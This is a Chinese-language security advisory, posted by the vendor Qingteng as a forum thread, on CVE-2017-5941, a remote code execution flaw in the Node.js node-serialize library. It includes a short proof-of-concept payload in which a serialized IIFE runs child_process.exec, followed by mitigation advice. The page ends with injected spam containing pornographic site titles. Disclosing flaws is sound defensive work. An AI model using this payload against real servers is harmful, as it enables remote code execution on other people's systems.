【漏洞公告】Node.js反序列化遠程代碼執行漏洞通告CVE-2017-5941

-回復 -瀏覽
樓主 2020-10-08 13:45:05
舉報 只看此人 收藏本貼 樓主

尊敬的客戶,Node.js爆出反序列化遠程代碼執行漏洞,該漏洞詳情如下:


1、綜述


Node.js是一個Javascript運行環境(runtime)。實際上它是對Google V8引擎進行了封裝。V8引擎執行Javascript的速度非???,性能非常好。Node.js對一些特殊用例進行了優化,提供了替代的API,使得V8在非瀏覽器環境下運行得更好。

Node.js存在反序列化遠程代碼執行漏洞,Node.js的node-serialize庫中存在一個漏洞,該漏洞通過傳輸JavaScript IIFE,利用惡意代碼(未信任數據)達到反序列化遠程任意代碼執行的效果。


2、漏洞概述


漏洞類型: 反序列化遠程代碼執行漏洞

危險等級: 高級

利用條件: 系統存在Node.js,并且存在node-serialize庫

受影響系統: 暫無補丁,Node.js全版本受影響


3、漏洞編號


CVE-2017-5941 Node.js反序列化遠程代碼執行漏洞


4、漏洞描述


Node.js存在反序列化遠程代碼執行漏洞,Node.js的node-serialize庫中存在一個漏洞,該漏洞通過傳輸JavaScript IIFE,利用惡意代碼(未信任數據)達到反序列化遠程任意代碼執行的效果。并且Nodejs服務端必須存在接收序列化的數據接口。


5、漏洞利用(POC)


var?serialize?=?require('node-serialize');
var?payload?=?'{"rce":"_$$ND_FUNC$$_function?(){require(\'child_process\').exec(\'ls?/\',?function(error,?stdout,?stderr)?{?console.log(stdout)?});}()"}';
serialize.unserialize(payload);?


6、修復建議


廠商尚未提供漏洞修補方案,請關注廠商主頁及時更新:https://github.com/luin/serialize


臨時解決方案:

1. 修改/node_modules/node-serialize/lib/serialize.js中的FUNCFLAG值為隨機值并保證該值不被泄漏。

2. 確保Serialize字符串僅內部發送

3. 使用公鑰(RAS)加密Serialize字符串,確保字符串不被篡改。


7、即時檢測


青藤云安全在漏洞爆出的第一時間,就己檢測出該威脅并通知相關客戶。


參考鏈接

1. https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

2. https://github.com/luin/serialize


聲明


本漏洞公告僅用來描述可能存在的安全問題,青藤云安全不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,青藤云安全不為此承擔任何責任。青藤云安全擁有對此安全公告的修改和解釋權。

青藤 簡介

青藤是國內首家自適應安全服務商,目前已經為互聯網金融、電子商務、企業服務領域的數十家知名互聯網企業提供輕量級、彈性可擴展的新一代安全服務體系。青藤,為企業云安全保駕護航。


我要推薦
轉發到
2019av手机天堂网免费_欧洲成在人线a免费视频_午夜私人成年影院 <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <蜘蛛词>| <文本链> <文本链> <文本链> <文本链> <文本链> <文本链>